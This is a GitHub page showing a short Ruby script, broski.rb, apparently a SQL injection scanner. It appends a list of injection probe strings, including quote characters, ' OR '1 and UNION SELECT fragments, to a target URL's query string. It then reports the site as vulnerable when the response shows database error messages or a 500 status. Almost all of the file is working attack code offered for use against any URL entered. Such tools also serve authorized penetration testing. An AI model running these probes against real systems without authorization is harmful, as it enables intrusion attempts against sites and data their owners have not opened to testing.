-
Notifications
You must be signed in to change notification settings - Fork 9
/
broski.rb
53 lines (47 loc) · 1.72 KB
/
broski.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
require 'net/http'
require 'open-uri'
puts """
,-----. ,------. ,-----. ,---. ,--. ,--.,--.
| |) /_ | .--. '' .-. '' .-' | .' /| |
| .-. \| '--'.'| | | |`. `-. | . ' | |
| '--' /| |\ \ ' '-' '.-' || |\ \| |
`------' `--' '--' `-----' `-----' `--' '--'`--'
"""
def main(url)
#Some payloads from https://github.com/payloadbox/sql-injection-payload-list
payloads = ["'","''","`","``",",",'"','""',
"' OR '1", "' OR '' = '", "'='", "'=0--+",
"'''''''''''''UNION SELECT '2", "%00", "||", "+","%"
]
#Some errors found on ghdb
errors = ["mysql_num_rows()","You have an error in your SQL syntax",
"mysql_fetch_array()", "mysql_query()", "Microsoft SQL Native Client error.",
"unexpected end of SQL command"]
payloads.each do |test|
target = URI.parse(url)
target.query += test
response = Net::HTTP.get_response(target)
if response.code == "200"
errors.each do |mhmh|
if response.body.include?(mhmh)
puts "\n#{target.to_s} is vulnerable \n#{mhmh}\n\n"
end
end
elsif response.code == "500"
puts "\n#{target.to_s} is vulnerable \n(500 internal server error)"
elsif response.code == "403"
puts "\n403 forbidden :skull:"
else
puts "\nStatus code: "+response.code
end
end
end
begin
print "\nTarget: "
main(gets.chomp)
rescue NoMethodError
puts "\nWarning: the target does not appear to have a query"
puts "Example target: http://testasp.vulnweb.com/showforum.asp?id=0"
rescue => error
puts error
end